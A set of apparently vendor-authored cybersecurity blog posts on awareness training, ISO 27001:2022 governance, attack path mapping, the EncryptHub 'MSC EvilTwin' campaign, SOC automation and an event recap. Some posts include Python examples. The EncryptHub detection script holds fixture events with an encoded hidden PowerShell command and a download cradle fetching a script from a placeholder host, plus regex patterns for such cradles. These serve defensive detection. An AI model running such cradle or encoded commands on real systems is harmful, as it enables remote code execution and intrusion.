
The Human Firewall: Why Cybersecurity Awareness Training Is Your Best Defence


Introduction

In the ever-evolving world of cyber threats, businesses often focus on implementing advanced technologies—firewalls, intrusion detection systems, endpoint security solutions—to keep attackers at bay. While these are vital, there’s one critical element that technology alone can’t fully control: human behaviour.

Employees remain both a company’s greatest asset and its most vulnerable security risk. A single click on a malicious link, an accidental download of an infected file, or a poorly chosen password can lead to devastating consequences. That’s why forward-thinking organisations are now investing in building a human firewall—a workforce trained to recognise and respond to cyber threats before they cause harm.

Why Technology Alone Isn’t Enough

Cybersecurity tools are essential, but they’re not infallible. Threat actors are becoming increasingly adept at bypassing traditional defences, often by exploiting human trust and error. Phishing attacks, for example, now account for a significant proportion of data breaches worldwide.

Unlike purely technical vulnerabilities, social engineering attacks rely on psychological manipulation. Cyber criminals prey on curiosity, urgency, and fear to trick individuals into giving away sensitive information or opening harmful attachments. Even the most advanced security system can be rendered useless if an employee unknowingly hands an attacker the keys to the network.

Understanding the Psychology of Social Engineering

The success of social engineering lies in its simplicity. Criminals use tactics that tap into natural human instincts:

  • Authority – impersonating a senior executive or official to pressure compliance.
  • Urgency – creating a false sense of time pressure to encourage quick, unthinking actions.
  • Curiosity – sending intriguing subject lines or attachments that tempt clicks.
  • Fear – threatening account closures or penalties to provoke an immediate reaction.

Cybersecurity awareness training teaches employees to pause, think, and verify before taking action—counteracting these psychological triggers.

Building the Human Firewall

Creating a human firewall requires more than a one-off training session. It’s an ongoing process that should be integrated into your organisation’s culture. Here are some best practices:

  • Regular Training and Simulations – Conduct quarterly or biannual phishing simulations to test and reinforce employee awareness.
  • Clear Reporting Channels – Ensure staff know exactly how and where to report suspicious emails or incidents.
  • Real-World Examples – Use recent, relevant case studies to highlight the real impact of cyber attacks.
  • Gamification – Turn training into a challenge, rewarding staff for spotting and reporting potential threats.
  • Inclusive Learning – Tailor training for different roles, ensuring relevance whether someone works in finance, HR, or IT.

When employees feel responsible for the security of the organisation, they’re more likely to remain vigilant and proactive.

The ROI of Cybersecurity Awareness

Many businesses hesitate to invest in training, viewing it as a cost rather than a strategic necessity. However, studies consistently show that awareness programmes can drastically reduce successful phishing attempts and data breaches. Preventing even a single incident can save thousands—if not millions—of pounds in lost revenue, legal fees, and reputational damage.

Moreover, a well-trained workforce instils greater customer confidence, demonstrating that your organisation takes security seriously.

Final Thoughts

In 2025, building a human firewall is no longer optional—it’s essential. By empowering employees with the skills and confidence to detect and respond to threats, businesses can create a powerful line of defence that complements technical measures.

🛡️ Don’t wait for a breach to expose weaknesses in your human firewall.

👉 Start with Exabytes eSecure to explore how we can help your organisation strengthen its people-powered defences.


How ISO 27001:2022 Is Reshaping Enterprise Cybersecurity Governance


The 2022 revision of ISO/IEC 27001—the global gold standard for information security management systems (ISMS)—has ushered in a new era of cybersecurity governance. As cyber threats evolve from malware to misinformation, and from credential theft to supply chain compromise, organizations need frameworks that adapt in real time, not just annually.

This article explores how ISO 27001:2022 reshapes governance structures in enterprise environments, particularly in SOC-driven, tool-integrated ecosystems using platforms like SentinelOne, Stellar Cyber, and Tenable.io. For organizations already certified, like ours, the new version aligns security practices more closely with risk, business objectives, and operational resilience.

From Control-Centric to Risk-Integrated Governance

In previous versions, ISO 27001 emphasized a checklist-style implementation of controls. The 2022 revision pivots toward governance that is risk-driven and context-sensitive.
Key changes include:
  • Increased focus on threat intelligence (A.5.7)
  • Integration of security into supplier relationships (A.5.22)
  • Emphasis on monitoring and continuous improvement
  • Recognition of new technologies and hybrid infrastructure
This shift reflects the real-world dynamics of modern SOCs, which rely on constant threat modeling and automation, rather than periodic audits and manual reviews.

Enhancing Governance with SentinelOne, Stellar Cyber, and Tenable

ISO 27001:2022 governance is no longer just about policies—it’s about integrating technology into decision-making and compliance workflows.
Technology – Contribution to Governance
  • SentinelOne (EDR) – Automates detection and response; helps enforce A.5.25 (response and continuity) and A.8.7 (endpoint protection)
  • Stellar Cyber (SIEM/XDR) – Enables audit logging, real-time analytics, threat intel ingestion, and compliance correlation for A.5.7 and A.5.30
  • Tenable.io – Assists in technical vulnerability management (A.8.8) and risk-based prioritization of exposures

Each of these tools produces governance artifacts—alerts, reports, dashboards—that serve as both operational aids and evidence during ISO audits.

Reshaping Cybersecurity Governance Practices

ISO 27001:2022 drives a transformation in how cybersecurity governance is perceived and practiced:

1. Governance as an Ongoing Activity

  • Logs from Stellar Cyber form real-time evidence trails
  • Continuous risk assessments using Tenable support monthly governance reviews

2. Cross-Department Involvement

  • Governance is no longer limited to IT or GRC teams
  • Marketing, finance, and HR must align their third-party engagements with A.5.22

3. Informed Decision-Making

  • SentinelOne and Stellar Cyber alerts inform management risk decisions
  • SOC dashboards feed directly into Board-level risk matrices

4. ISO Governance = Operational Efficiency

  • Mapping ISO controls to existing tools prevents duplicate workflows
  • Enhances both security posture and audit readiness

Benefits of ISO 27001:2022 Governance

Benefit – Description
  • Dynamic Risk Management – Adapts to evolving threat landscapes in real time
  • Alignment with Cybersecurity Frameworks – Compatible with NIST CSF, CIS, and MITRE ATT&CK
  • Scalability Across Teams – Makes governance a shared responsibility, not a siloed function
  • Audit Efficiency – Prepares organizations for internal, customer, and regulatory audits
  • Improved Incident Response – Governance becomes actionable, not bureaucratic

Final Thoughts

The 2022 revision of ISO/IEC 27001 marks more than just a compliance update — it redefines cybersecurity governance as a continuous, intelligence-driven practice. Gone are the days when governance was a checklist exercise; today, it demands integration of risk, automation, and cross-department collaboration.
For SOCs leveraging platforms like SentinelOne, Stellar Cyber, and Tenable.io, this shift represents opportunity. By embedding governance into daily operations, organizations not only strengthen their security posture but also gain measurable ROI: faster audits, reduced duplication of controls, and improved alignment with business objectives.
For enterprises already certified — or preparing for certification — ISO 27001:2022 is less a burden and more a blueprint for resilience. It empowers CISOs and security teams to transform governance into a proactive shield against evolving threats while streamlining compliance readiness.
🛡️ Governance should not be reactive paperwork.
👉 Start with Exabytes eSecure to align your security operations with ISO 27001:2022, strengthen your governance framework, and ensure your SOC stays ahead of both compliance and adversaries.


Attack Path Mapping with Tenable and Stellar Cyber


In the modern threat landscape, attackers no longer rely on a single point of entry. Instead, they follow a multi-stage progression—exploiting weak configurations, escalating privileges, and pivoting laterally across the network. Understanding and visualizing these potential attack paths is critical for proactive defense.
This article explores how Tenable and Stellar Cyber work together to deliver Attack Path Mapping (APM), empowering Security Operations Centers (SOCs) to anticipate and disrupt adversary movements before a breach occurs. For ISO 27001-certified organizations like ours, APM is more than a capability—it’s a strategic asset for compliance, threat mitigation, and operational resilience.

What Is Attack Path Mapping?

Attack Path Mapping refers to the process of identifying all the possible ways a threat actor can move through an environment—from initial access to critical assets. Unlike traditional vulnerability scanning, APM contextualizes risk based on:
  • Asset criticality
  • User privileges
  • Network topology
  • Exploitable vulnerabilities
  • Security misconfigurations
In short, APM connects the dots between exposures and how they can be chained together to compromise high-value targets.

Tenable: Exposure Management Engine

Tenable.io and Tenable One provide continuous vulnerability assessment and contextual prioritization across:
  • Servers
  • Workstations
  • Cloud workloads
  • Web applications
  • Identity systems (e.g., Active Directory)
Key features that enable APM include:
  • Cyber Exposure Score (CES)
  • Asset criticality tagging
  • Vulnerability chaining detection
  • Attack path simulation (via Tenable Identity Exposure)
For example, Tenable may detect a vulnerable Apache server, exposed credentials in AD, and an unpatched domain controller—forming a full attack path that needs urgent mitigation.

Stellar Cyber: Correlating APM with SIEM/XDR Context

While Tenable identifies exposures, Stellar Cyber correlates them with real-time telemetry and security events. This integration allows:
  • Enrichment of vulnerability data with live endpoint or user behavior
  • Threat scoring based on MITRE ATT&CK TTPs
  • Graph-based visualization of potential attacker lateral movement
  • Automatic playbook triggering to isolate compromised assets
For instance, if Tenable reports an AD misconfiguration and SentinelOne flags unusual LDAP queries, Stellar Cyber will map these into an active attack path and generate a correlated incident.
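The chaining and correlation described above, as an added example that is not Tenable's or Stellar Cyber's code: a small Python model builds a graph of exposures between constructed assets, enumerates paths from internet-facing hosts to crown-jewel assets, and ranks them by target criticality, exploitability and whether live telemetry already shows activity on a hop. Asset names, findings, CVSS values and the alert fields are invented, and the scoring formula is an illustration of risk-based prioritization rather than any vendor's algorithm.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Asset:
    name: str
    criticality: int            # 1 (low) .. 5 (crown jewel), from asset criticality tagging
    internet_facing: bool = False


@dataclass(frozen=True)
class Exposure:
    src: str                    # asset an attacker would already hold
    dst: str                    # asset reachable by abusing this finding
    finding: str                # scanner finding (constructed label)
    cvss: float
    exploitable: bool           # usable as-is (public exploit or plain misconfiguration)


# Constructed inventory mirroring the chain in the text: an internet-facing Apache
# server, credentials exposed on a file share, and an unpatched domain controller.
ASSETS = {a.name: a for a in [
    Asset("web-01", 2, internet_facing=True),
    Asset("file-01", 3),
    Asset("dc-01", 5),
    Asset("hr-laptop", 2),
]}

EXPOSURES = [
    Exposure("web-01", "file-01", "Apache RCE, public exploit", 9.8, True),
    Exposure("file-01", "dc-01", "domain admin credentials on open share", 7.5, True),
    Exposure("web-01", "hr-laptop", "kernel flaw, no known exploit", 9.9, False),
    Exposure("hr-laptop", "dc-01", "unpatched DC, exploit needs a foothold", 8.8, True),
]

# Constructed live telemetry forwarded into the XDR layer (the "unusual LDAP queries" case).
ALERTS = [{"host": "file-01", "signal": "unusual LDAP queries from service account"}]


def find_paths(assets, exposures, min_criticality=4, max_hops=4):
    """Enumerate simple exposure chains from internet-facing assets to critical ones."""
    graph = defaultdict(list)
    for e in exposures:
        graph[e.src].append(e)
    paths = []

    def walk(node, visited, trail):
        if trail and assets[node].criticality >= min_criticality:
            paths.append(trail)          # stop at the first critical asset reached
            return
        if len(trail) >= max_hops:
            return
        for e in graph[node]:
            if e.dst not in visited:
                walk(e.dst, visited | {e.dst}, trail + [e])

    for a in assets.values():
        if a.internet_facing:
            walk(a.name, {a.name}, [])
    return paths


def score_path(path, assets, alerts):
    """Target criticality, scaled by how much of the chain is exploitable today and by
    chain length, then multiplied up when live alerts already sit on a hop."""
    target = assets[path[-1].dst]
    exploitable_share = sum(e.exploitable for e in path) / len(path)
    score = target.criticality * exploitable_share / len(path)
    hosts = {path[0].src} | {e.dst for e in path}
    live_hits = sum(1 for a in alerts if a["host"] in hosts)
    return round(score * (1 + live_hits), 3)


def rank_paths(assets, exposures, alerts):
    """Return (score, [hosts on the path]) pairs, highest risk first."""
    paths = sorted(find_paths(assets, exposures),
                   key=lambda p: score_path(p, assets, alerts), reverse=True)
    return [(score_path(p, assets, alerts), [p[0].src] + [e.dst for e in p]) for p in paths]


def remediation_order(assets, exposures, alerts):
    """Findings in the order the ranked paths put them, deduplicated."""
    paths = sorted(find_paths(assets, exposures),
                   key=lambda p: score_path(p, assets, alerts), reverse=True)
    order = []
    for p in paths:
        for e in p:
            if e.finding not in order:
                order.append(e.finding)
    return order


def top_by_cvss(exposures):
    """What a CVSS-only queue would put first, for contrast with the path ranking."""
    return max(exposures, key=lambda e: e.cvss)


if __name__ == "__main__":
    for score, hosts in rank_paths(ASSETS, EXPOSURES, ALERTS):
        print(f"{score:5.2f}  {' -> '.join(hosts)}")
    print("CVSS-first:", top_by_cvss(EXPOSURES).finding)
    print("Path-first:", remediation_order(ASSETS, EXPOSURES, ALERTS)[:2])
```

The 9.9 kernel flaw tops a CVSS-only queue, but the fully exploitable chain through the file share, with a live alert on it, is what the path ranking puts first.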

Benefits of Attack Path Mapping in SOC

Benefit – Description
  • Proactive Defense – Fix vulnerabilities before they’re exploited
  • Risk-Based Prioritization – Focus remediation on exploitable paths, not just CVSS scores
  • Faster Incident Response – Visual correlation between vulnerability and active behavior
  • Compliance Alignment – Supports ISO 27001 controls such as A.12.6.1 (technical vulnerability management)
  • Audit Readiness – Clear visibility into how exposure leads to risk

ISO 27001 Alignment

Relevant ISO 27001:2022 Controls:
  • A.12.6.1: Information systems should be regularly reviewed for vulnerabilities.
  • A.5.31: Threat intelligence and scenario analysis should inform controls.
  • A.8.16: Management of privileged access paths and user rights.
The joint use of Tenable and Stellar Cyber provides continuous evidence of:
  • Proactive threat modeling
  • Exposure management
  • Informed access and vulnerability mitigation strategies
This not only supports audits but reinforces a culture of security by design.

Conclusion

For modern SOCs, the challenge isn’t just finding vulnerabilities — it’s understanding how they connect to form real-world attack paths. Traditional vulnerability scanning provides visibility, but without context, it leaves defenders blind to how attackers actually move.

Attack Path Mapping changes this paradigm. By combining Tenable’s exposure management with Stellar Cyber’s XDR correlation, SOC teams gain a proactive, threat-informed defense strategy. The result: reduced dwell time, smarter prioritization, and measurable ROI through faster detection, streamlined incident response, and stronger ISO 27001 compliance evidence.

For organizations committed to resilience, the choice is clear. Attack Path Mapping isn’t just about closing gaps — it’s about future-proofing your defenses and maximizing the value of your security investments.

🛡️ Don’t wait for adversaries to define your attack paths.

👉 Start with Exabytes eSecure to map your exposures, align with ISO 27001 controls, and strengthen your defenses against tomorrow’s threats.


EncryptHub: MSC EvilTwin Exploitation & Stealthy Malware Delivery


A Russian-linked threat group is combining convincing IT-support impersonation with an MMC vulnerability (“MSC EvilTwin”) to execute malicious console files, drop loaders, and persist via stealthy backdoors.

What Is MSC EvilTwin and EncryptHub?

EncryptHub—also tracked in open sources as LARVA-208 / Water Gamayun—is a financially motivated threat actor known for agile social-engineering campaigns. In recent activity, the group abused a high-severity Microsoft Management Console behavior dubbed MSC EvilTwin, enabling execution of a .msc file with the same display name as a legitimate console so that mmc.exe loads the attacker-controlled file.

Why this matters: the attack subverts a trusted Windows administrative workflow (MMC), giving malicious code the legitimacy of a native management console.

Why It Matters

  • Trusted tools weaponized: Malicious .msc files masquerade as legitimate consoles, reducing user suspicion during execution.
  • Social engineering supercharge: Operators impersonate IT support (via Teams/calls/chat) to convince targets to run scripts or consoles “to fix an issue.”
  • Evolving toolkit: Campaigns feature PowerShell loaders, a Golang loader often referred to as SilentCrystal, and a SOCKS5 backdoor for resilient C2.

How the Attack Works (End-to-End Flow)

  1. Initial approach: The victim is contacted by a fake help-desk persona urging urgent remediation (account lockout, update failure, etc.).
  2. Loader execution: A PowerShell script (e.g., runner.ps1) places two identically named console files—one benign, one rogue—where Windows resolves the attacker version first.
  3. MSC EvilTwin triggers: MMC launches the malicious .msc, executing attacker logic under the guise of an admin console.
  4. Payload chain: The console retrieves another script (e.g., build.ps1), gathers host data, establishes persistence, and beacons to C2.
  5. Post-exploitation: Tooling such as SilentCrystal and a SOCKS5 Golang backdoor provide encrypted proxying and long-lived access; data theft tooling (e.g., stealer malware) may follow.

Key Takeaways

Insight – Implication
  • Legit admin paths abused – Malicious consoles blend into standard IT workflows and bypass casual scrutiny.
  • People are the entry point – Convincing support impersonation remains the most reliable initial access vector.
  • Stealthy loaders/backdoors – Golang loaders and SOCKS5 tunnels complicate detection and response.
  • Cloud + browser abuse – Legitimate services (e.g., support portals or file hosting) can be misused for staging.

Defensive Playbook

  1. Patch & harden MMC usage: Keep Windows fully updated; restrict arbitrary .msc execution and require code provenance (AppLocker/WDAC).
  2. Constrain PowerShell: Enable Constrained Language Mode where feasible; log Script Block, Module, and Transcription; alert on suspicious encodings and download cradles.
  3. EDR detections: Flag creation/launch of unknown .msc files, odd MMC load paths, and persistence artifacts following MMC launches.
  4. Network controls: Monitor for unusual TLS beacons and SOCKS5 tunnels; egress-filter to approved destinations; deploy DNS sinkholes for known bads.
  5. Anti-impersonation drills: Train users to verify IT requests via a secondary, trusted channel; pre-publish “no-go” policies (IT will never ask you to run X).
  6. Browser & platform hygiene: Validate updates/support links; disable side-loading of support packages; monitor for staging via public support resources.
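Items 2 and 3 of the playbook, as added example detection logic that is not part of the original post or of any vendor product: three heuristics run over constructed EDR-style process and file events and return the findings a SOC would triage. Host names, user paths, field names and the base64 argument are invented; treat the rules as triage signals to tune, since administrators do save custom consoles outside System32.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Windows keeps its own consoles here; a .msc loaded from anywhere else is a triage signal
# (admins do save custom consoles elsewhere, so this is a heuristic, not a block rule).
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
MSC_ARG = re.compile(r'"([^"]+\.msc)"|(\S+\.msc)', re.I)
ENCODED_FLAG = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
INVOKE = re.compile(r"\biex\b|invoke-expression", re.I)

# Constructed telemetry in the shape an EDR forwards. Hosts, users, paths and field names
# are invented; the base64 argument is a placeholder, not a real payload.
EVENTS = [
    {"type": "process_create", "host": "WS-042", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc QUJDREVGR0g="},
    {"type": "file_create", "host": "WS-042",
     "path": r"C:\Users\alice\AppData\Local\Temp\svc\WmiMgmt.msc"},
    {"type": "file_create", "host": "WS-042",
     "path": r"C:\Users\alice\AppData\Local\Temp\svc\bin\WmiMgmt.msc"},
    {"type": "process_create", "host": "WS-042",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\mmc.exe",
     "command_line": r'"C:\Windows\System32\mmc.exe" "C:\Users\alice\AppData\Local\Temp\svc\WmiMgmt.msc"'},
    {"type": "process_create", "host": "WS-042", "parent_image": r"C:\Windows\System32\mmc.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -c \"iex (New-Object Net.WebClient)"
                     ".DownloadString('https://example.invalid/build.ps1')\""},
    # Benign activity on another host: an admin opens Event Viewer, a scheduled script runs.
    {"type": "process_create", "host": "WS-007", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mmc.exe",
     "command_line": r'"C:\Windows\System32\mmc.exe" "C:\Windows\System32\eventvwr.msc"'},
    {"type": "process_create", "host": "WS-007", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
]


def console_path(command_line):
    """Return the .msc argument handed to mmc.exe, or None."""
    m = MSC_ARG.search(command_line)
    return (m.group(1) or m.group(2)) if m else None


def check_mmc_launch(ev):
    """Rule 1: mmc.exe loading a console from outside the Windows system directories."""
    if not ev["image"].lower().endswith("mmc.exe"):
        return None
    msc = console_path(ev["command_line"])
    if msc and not str(PureWindowsPath(msc).parent).lower().startswith(SYSTEM_DIRS):
        return ("mmc_console_outside_system_dir", ev["host"], msc)
    return None


def check_powershell(ev):
    """Rule 2: encoded PowerShell command lines, or a download cradle fed into iex."""
    if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    cl = ev["command_line"]
    if ENCODED_FLAG.search(cl):
        return ("powershell_encoded_command", ev["host"], cl)
    if CRADLE.search(cl) and INVOKE.search(cl):
        return ("powershell_download_cradle", ev["host"], cl)
    return None


def check_twin_consoles(events):
    """Rule 3: one console file name written to two directories on the same host, the
    'two identically named console files' pattern from step 2 of the attack flow."""
    seen = defaultdict(set)
    for ev in events:
        if ev["type"] == "file_create" and ev["path"].lower().endswith(".msc"):
            p = PureWindowsPath(ev["path"])
            seen[(ev["host"], p.name.lower())].add(str(p.parent).lower())
    return [("msc_twin_files", host, name, sorted(dirs))
            for (host, name), dirs in seen.items() if len(dirs) > 1]


def triage(events):
    """Apply all rules and return the findings for analyst review."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create":
            for rule in (check_mmc_launch, check_powershell):
                hit = rule(ev)
                if hit:
                    findings.append(hit)
    findings.extend(check_twin_consoles(events))
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```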

Conclusion

EncryptHub’s campaigns demonstrate how quickly threat actors adapt: blend social pressure with native Windows tooling, then hide behind modern loaders and encrypted tunnels. Meeting this challenge requires layered controls—technical guardrails around MMC and PowerShell, rigorous user verification practices, and telemetry that correlates social-engineering signals with endpoint and network behaviors.


Cybersecurity Automation: The Key to Faster Incident Response


Introduction

In today’s high-stakes digital environment, security teams are overwhelmed with alerts, manual processes, and limited resources. Traditional approaches to incident response are too slow to keep up with fast-moving threats. That’s why organizations are turning to cybersecurity automation—a powerful strategy that uses machine intelligence to detect, respond to, and neutralize threats in real time.

Cybersecurity automation is not about replacing human analysts—it’s about giving them superpowers.

What is Cybersecurity Automation?

Cybersecurity automation refers to the use of software and artificial intelligence to automatically handle security tasks that were previously done manually. These can include alert triage, threat detection, containment, ticketing, and even post-incident reporting.

At its core, cybersecurity automation accelerates response times, reduces human error, and ensures consistency across the security operations center (SOC).

Why Automation is Critical for Incident Response

Manual incident response can take hours—or even days—to remediate threats. Meanwhile, attackers can exfiltrate data, move laterally, or destroy assets. Here’s how cybersecurity automation addresses these challenges:

Speed: Automated tools respond within seconds, minimizing the window of opportunity for attackers.

Consistency: Playbooks execute the same way every time, ensuring policy adherence and audit readiness.

Efficiency: Freeing analysts from repetitive tasks lets them focus on high-impact investigations.

Scalability: Automation scales effortlessly with growing data volumes and attack surfaces.

Examples of Automation in Action

Phishing Email Response: When a phishing email is reported, an automated system can isolate the message, scan the payload, and quarantine similar emails across the network.

Endpoint Isolation: If malware is detected, the system can isolate the compromised endpoint, notify the SOC, and initiate remediation.

User Account Lockout: Automation can instantly disable accounts showing signs of credential compromise, limiting attacker movement.

Tools Enabling Cybersecurity Automation

Modern cybersecurity platforms include built-in automation features or integrate with SOAR (Security Orchestration, Automation, and Response) tools.

SentinelOne: Endpoint Automation at Its Best

SentinelOne leverages AI and machine learning to deliver autonomous detection and response at the endpoint level. Its automation features include:

Real-time threat mitigation: Automatically kills malicious processes and isolates endpoints.

ActiveEDR with Storyline™: Automatically tracks the full context of an attack and responds without human intervention.

Rollback capability: Unique to Windows, allows automated recovery from ransomware with one click.

SOAR integrations: Supports automation with tools like ServiceNow, Splunk Phantom, and Cortex XSOAR.


Getting Started with Cybersecurity Automation

You don’t need a massive overhaul to begin with cybersecurity automation. Start small and scale smart:

Identify Repetitive Tasks: Begin with alert triage or phishing email responses—simple, high-frequency actions.

Create Automation Playbooks: Document each step in your current response process, then digitize it.

Test and Monitor: Run automated processes in parallel with manual efforts to build confidence and tweak performance.

Train Your Team: Ensure analysts understand how automation works and how to oversee it.

Common Challenges

While cybersecurity automation offers big rewards, it comes with some hurdles:

False Positives: Poorly tuned rules may trigger unnecessary actions.

Over-Reliance: Teams may neglect validation if they trust automation blindly.

Integration Complexity: Not all tools work well together out of the box.

However, with careful design, governance, and testing, these risks can be mitigated.
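The three scenarios above, the "test and monitor in parallel" step, and the false-positive and over-reliance challenges, as one added example (not a SentinelOne or SOAR product feature): a small Python orchestrator with a shadow mode that records what it would do without acting, a confidence threshold per action impact, an approval queue for high-impact steps, and an agreement metric against the analysts' manual decisions. Alert types, thresholds, step names and the connector hook are assumptions.

```python
from dataclasses import dataclass
from enum import Enum


class Mode(Enum):
    SHADOW = "shadow"   # decide and record, but call no connectors (runs beside manual handling)
    LIVE = "live"


@dataclass(frozen=True)
class Alert:
    alert_id: str
    kind: str           # "phishing_report" | "malware_detected" | "credential_compromise"
    confidence: float   # 0..1, from the detecting tool
    target: str         # mailbox, hostname or account the action applies to


# Response steps for the three scenarios in the text, with an impact class per step.
# (Assumed step names; in a real SOAR each maps to an integration such as the EDR or mail API.)
PLAYBOOKS = {
    "phishing_report": [("quarantine_message", "low"), ("scan_attachment", "low"),
                        ("purge_similar_messages", "high")],
    "malware_detected": [("isolate_endpoint", "high"), ("notify_soc", "low"),
                         ("start_remediation", "high")],
    "credential_compromise": [("disable_account", "high"), ("revoke_sessions", "high"),
                              ("notify_soc", "low")],
}

# Confidence needed to run unattended. Between the two bars an action waits for an analyst,
# which keeps a poorly tuned rule from taking irreversible steps on its own.
AUTO_THRESHOLD = {"low": 0.6, "high": 0.9}


class Orchestrator:
    def __init__(self, mode=Mode.SHADOW):
        self.mode = mode
        self.calls = []      # connector invocations actually made (empty in shadow mode)
        self.audit = []      # every decision, for audit trails and tuning

    def decide(self, alert, impact):
        if alert.confidence >= AUTO_THRESHOLD[impact]:
            return "executed"
        if alert.confidence >= AUTO_THRESHOLD["low"]:
            return "approval"
        return "skipped"

    def run(self, alert):
        outcome = {"executed": [], "approval": [], "skipped": []}
        for name, impact in PLAYBOOKS.get(alert.kind, []):
            decision = self.decide(alert, impact)
            outcome[decision].append(name)
            self.audit.append((alert.alert_id, name, decision, self.mode.value))
            if decision == "executed" and self.mode is Mode.LIVE:
                self.calls.append((name, alert.target))   # real integration call goes here
        return outcome

    def agreement(self, analyst_actions):
        """Share of shadow-mode 'executed' decisions the analysts also took by hand.
        analyst_actions: {alert_id: set(step names)} from the parallel manual process."""
        proposed = [(aid, name) for aid, name, d, m in self.audit
                    if d == "executed" and m == Mode.SHADOW.value]
        if not proposed:
            return None
        agreed = sum(1 for aid, name in proposed if name in analyst_actions.get(aid, set()))
        return round(agreed / len(proposed), 3)


# Constructed alerts and the analysts' parallel decisions on the same cases.
ALERTS = [
    Alert("A-1", "phishing_report", 0.95, "alice@example.com"),
    Alert("A-2", "malware_detected", 0.75, "WS-042"),
    Alert("A-3", "credential_compromise", 0.40, "svc-backup"),
]
ANALYST_ACTIONS = {
    "A-1": {"quarantine_message", "scan_attachment"},   # analysts judged the purge unnecessary
    "A-2": {"notify_soc", "isolate_endpoint"},
}


def shadow_trial(alerts=ALERTS, analyst_actions=ANALYST_ACTIONS):
    """Run the playbooks in shadow mode; return outcomes, agreement rate and connector calls."""
    orch = Orchestrator(Mode.SHADOW)
    outcomes = {a.alert_id: orch.run(a) for a in alerts}
    return outcomes, orch.agreement(analyst_actions), orch.calls


if __name__ == "__main__":
    outcomes, rate, calls = shadow_trial()
    for aid, outcome in outcomes.items():
        print(aid, outcome)
    print("agreement with analysts:", rate, "| connector calls made:", len(calls))
```

An agreement rate that stays below the level the team is comfortable with is the signal to retune thresholds or playbook steps before switching the orchestrator to live mode.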

Conclusion

Cybersecurity automation is no longer a luxury—it’s a necessity for modern incident response. By reducing response times, improving consistency, and enabling faster recovery, automation empowers security teams to outpace cyber threats. Using platforms like SentinelOne for integrating automation into your SOC gives you a crucial edge.

🛡️ Don’t wait for a breach to reveal your weaknesses.

👉 Start with Exabytes eSecure to explore how we can help you strengthen your cybersecurity and incident response with AI-driven solutions.

Building on Success, Growing Forward: AWS | Exabytes: Scale Your Enterprise with Cloud-Driven AI

We successfully wrapped up the first-ever AWS | Exabytes: Scale Your Enterprise with Cloud-Driven AI event in Singapore — a full-day gathering at the AWS SG Office, IOI Central Boulevard Towers. The event brought together business leaders, IT professionals, and decision-makers to explore how cloud, AI, and data-driven strategies can unlock competitive advantage and drive enterprise transformation.

Setting the Stage: Where Enterprises Begin

The day opened with a welcome address by Roger Lew, Vice President & SG Country Manager at Exabytes Singapore, who emphasised the importance of building a strong digital foundation for enterprises in Singapore to fully harness the potential of AI and cloud adoption.
This set the tone for a series of insightful sessions led by industry experts:
  • Dhiraj Garg, Migration BD at AWS, explored Reimagining Business Innovation, highlighting how cloud migration and modernisation strategies enable organisations to scale efficiently and remain competitive in a rapidly evolving digital economy.
  • Kenneth Ng, Assistant Vice President Solution Architect & Technical Consultant at Exabytes Group, presented Unlocking Enterprise Growth: Harnessing the Power of Cloud-Driven AI, demonstrating practical applications of AI in decision-making, operations optimisation, and business agility.
  • Gary Gardiner, Director Solution Engineering APJ at SentinelOne, addressed the evolving security landscape, showcasing how AI-powered CNAPP solutions empower enterprises to proactively safeguard against runtime threats and sophisticated cyberattacks.
  • Richard Cheng, Project Director of FormX.ai, introduced the transformative role of intelligent document processing (IDP), illustrating how AI-powered workflows streamline complex document management, reduce manual errors, and enhance operational efficiency.

Panel Discussion: Innovate or Fall Behind

A standout moment of the event was the panel discussion on “Cloud & AI as a Competitive Advantage,” moderated by Arren Tan, Assistant Vice President of Enterprise Sales at Exabytes Group.
The panel brought together:
  • Gary Gardiner, Director of Solution Engineering APJ, SentinelOne
  • Richard Cheng, Project Director, FormX.ai
The discussion offered diverse perspectives on how Singapore enterprises can leverage cloud and AI while balancing innovation, security, compliance, and cost optimisation – key ingredients for sustainable growth in a digital-first economy.

Practical Insights for Singapore Enterprises

Participants gained practical strategies to accelerate their digital transformation journeys, with discussions centred on three key areas:
AI-Driven Data & Analytics – Identifying initial AI use cases, cultivating a data-driven culture, and enhancing customer engagement through personalisation and business intelligence.
Business Modernisation with Cloud & AI – Simplifying cloud migration with minimal disruption, enabling scalability, optimising costs, and supporting compliance in regulated industries.
Cloud Security (CNAPP by SentinelOne) – Strengthening enterprise security with advanced cloud-native protection, ensuring resilience while safeguarding sensitive data.
These insights equipped enterprises with actionable approaches to embrace cloud-driven AI confidently while balancing innovation, resilience, and cost efficiency.

Thank You to Our Partners

We extend our heartfelt appreciation to our partners whose collaboration made this event possible.
As our co-organiser, Amazon Web Services (AWS) played an instrumental role in shaping conversations on innovation and digital transformation. With their expertise in cloud infrastructure and enterprise modernisation, AWS continues to empower businesses in Singapore to reimagine possibilities in today’s AI-driven economy.
We are equally proud to have SentinelOne as our strategic partner. Their AI-powered cybersecurity solutions, including the SentinelOne Singularity™ Platform, provide proactive and autonomous protection across endpoints, cloud, and identity—helping organisations strengthen resilience in an increasingly complex threat landscape.
As our supporting partner, FormX.ai drives operational efficiency through its intelligent document processing (IDP) platform. By leveraging AI-powered data extraction, FormX.ai transforms unstructured documents into actionable insights, enabling businesses to boost productivity and agility.
Together, these partnerships reflect a shared vision: to harness AI, cloud, and cybersecurity innovation in accelerating enterprise growth, strengthening digital resilience, and shaping a smarter future for businesses in Singapore and beyond.

Looking Ahead

